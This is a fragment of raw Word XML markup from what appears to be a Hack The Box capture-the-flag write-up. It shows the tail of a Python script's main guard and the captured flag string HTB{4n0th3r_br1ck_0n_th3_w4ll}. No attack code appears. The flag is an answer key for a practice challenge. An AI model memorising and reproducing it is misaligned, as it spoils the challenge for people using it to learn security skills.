      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="d4d4d4"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="ce9178"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"__main__"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="d4d4d4"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:shd w:fill="1e1e1e" w:val="clear"/>
        <w:spacing w:line="324.00000000000006" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="6a9955"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pP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dcdcaa"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">main</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="d4d4d4"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">()  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="6a9955"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Run the script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:ind w:left="72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The Flag is finally given as is printed out as:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="72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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTB{4n0th3r_br1ck_0n_th3_w4ll}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">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2E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa" w:cs="Comfortaa" w:eastAsia="Comfortaa" w:hAnsi="Comfortaa"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>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6">
    <w:pPr>
      <w:ind w:left="72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30">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32">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8.jpg"/>
        </v:shape>
      </w:pic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-114292</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>7912176</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="5943600" cy="3771900"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="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5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId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